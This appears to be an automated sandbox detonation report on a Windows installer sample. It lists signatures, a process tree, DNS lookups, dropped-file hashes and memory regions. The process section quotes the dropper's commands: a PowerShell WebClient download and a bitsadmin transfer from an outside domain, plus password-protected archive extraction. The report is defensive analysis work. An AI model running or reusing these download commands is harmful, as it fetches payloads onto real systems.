memory/1832-122-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-121-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-120-0x0000000007580000-0x0000000007581000-memory.dmp

memory/1832-117-0x0000000007570000-0x0000000007571000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-26 04:49

Reported

2024-07-26 04:52

Platform

win10v2004-20240709-en

Max time kernel

142s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"

Signatures

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\ConsoleApp\7za.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1684 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
PID 1684 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
PID 1684 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
PID 3960 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 3960 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 3960 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 3960 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 3960 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 3960 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 2984 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2984 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2984 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 228 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 228 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2984 wrote to memory of 2028 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 2984 wrote to memory of 2028 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 2984 wrote to memory of 2028 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 2984 wrote to memory of 1592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2984 wrote to memory of 1592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2984 wrote to memory of 1592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3960 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe
PID 3960 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe
PID 3960 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe
PID 5088 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp
PID 5088 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp
PID 5088 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe

"C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"

C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp

"C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp" /SL5="$40210,38098121,731648,C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml

C:\ProgramData\ConsoleApp\7za.exe

7za.exe x -y -p1r7d2kvUf3 "*.7z"

C:\Windows\SysWOW64\timeout.exe

timeout /T 3 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe

"C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe"

C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$20276,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 thddghdd3.com udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/1684-1-0x0000000000400000-0x00000000004C0000-memory.dmp

memory/1684-2-0x0000000000401000-0x00000000004A9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp

MD5 f098bb35dca6ae44a05c65aac7a5444b
SHA1 c5c50d740c1b8e9d8715fc3b2c8026156295a437
SHA256 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe
SHA512 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b

memory/3960-6-0x0000000000400000-0x000000000067B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\ProgramData\ConsoleApp\ControlSet000.bat

MD5 484c8df5d5bd9d82f4ac1861472cf519
SHA1 eddc0d20c81d9dba14ee0be32c7c5f563481e792
SHA256 f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953
SHA512 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7

C:\ProgramData\ConsoleApp\main.bat

MD5 0ddc6dd98f86cff7e50c1621fd16b55a
SHA1 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a
SHA256 b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6
SHA512 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609

memory/3124-25-0x0000000072B0E000-0x0000000072B0F000-memory.dmp

memory/3124-26-0x0000000004C70000-0x0000000004CA6000-memory.dmp

memory/3124-27-0x0000000005410000-0x0000000005A38000-memory.dmp

memory/3124-28-0x0000000005250000-0x0000000005272000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_taajmkf4.od4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3124-29-0x0000000005B40000-0x0000000005BA6000-memory.dmp

memory/3124-30-0x0000000005BB0000-0x0000000005C16000-memory.dmp

memory/3124-40-0x0000000005D20000-0x0000000006074000-memory.dmp

memory/3124-41-0x0000000006200000-0x000000000621E000-memory.dmp

memory/3124-42-0x0000000006250000-0x000000000629C000-memory.dmp

memory/3124-43-0x0000000007870000-0x0000000007EEA000-memory.dmp

memory/3124-44-0x0000000006710000-0x000000000672A000-memory.dmp

C:\ProgramData\ConsoleApp\7za.exe

MD5 c3d309156b8e8cf1d158de5fab1c2b40
SHA1 58ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA512 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe

MD5 05fda662bb382c2c95b9318b2394b246
SHA1 69365314afb6102209a806e0e474d94e58207ec6
SHA256 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2
SHA512 b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312

memory/5088-52-0x0000000000400000-0x0000000000417000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp

MD5 9d7850e858c24db77b91b25adf93812f
SHA1 f0bb0a9074b38dad7492422247c0a316197d26b6
SHA256 c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8
SHA512 e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec

memory/928-68-0x0000000007130000-0x0000000007146000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SQCH2.tmp\ISTask.dll

MD5 86a1311d51c00b278cb7f27796ea442e
SHA1 ac08ac9d08f8f5380e2a9a65f4117862aa861a19
SHA256 e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d
SHA512 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

C:\Users\Admin\AppData\Local\Temp\is-SQCH2.tmp\VclStylesInno.dll

MD5 b0ca93ceb050a2feff0b19e65072bbb5
SHA1 7ebbbbe2d2acd8fd516f824338d254a33b69f08d
SHA256 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246
SHA512 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2

memory/928-74-0x0000000007360000-0x000000000767A000-memory.dmp

memory/928-78-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-81-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-84-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-83-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-82-0x00000000077F0000-0x00000000077F1000-memory.dmp

memory/928-80-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-79-0x00000000077E0000-0x00000000077E1000-memory.dmp

memory/928-95-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-99-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-132-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-133-0x0000000007900000-0x0000000007901000-memory.dmp

memory/928-131-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-130-0x00000000078F0000-0x00000000078F1000-memory.dmp

memory/928-128-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-127-0x00000000078E0000-0x00000000078E1000-memory.dmp

memory/928-126-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-125-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-124-0x00000000078D0000-0x00000000078D1000-memory.dmp

memory/928-123-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-122-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-121-0x00000000078C0000-0x00000000078C1000-memory.dmp

memory/928-120-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-119-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-118-0x00000000078B0000-0x00000000078B1000-memory.dmp

memory/928-117-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-116-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-115-0x00000000078A0000-0x00000000078A1000-memory.dmp

memory/928-114-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-113-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-112-0x0000000007890000-0x0000000007891000-memory.dmp

memory/928-111-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-110-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-109-0x0000000007880000-0x0000000007881000-memory.dmp

memory/928-108-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-107-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-106-0x0000000007870000-0x0000000007871000-memory.dmp

memory/928-105-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-104-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-103-0x0000000007860000-0x0000000007861000-memory.dmp

memory/928-102-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-101-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-100-0x0000000007850000-0x0000000007851000-memory.dmp

memory/928-129-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-98-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-97-0x0000000007840000-0x0000000007841000-memory.dmp

memory/928-96-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-92-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-91-0x0000000007820000-0x0000000007821000-memory.dmp

memory/928-90-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-89-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-88-0x0000000007810000-0x0000000007811000-memory.dmp

memory/928-87-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-86-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-85-0x0000000007800000-0x0000000007801000-memory.dmp

memory/928-94-0x0000000007830000-0x0000000007831000-memory.dmp

memory/928-93-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-77-0x0000000007680000-0x00000000077C0000-memory.dmp

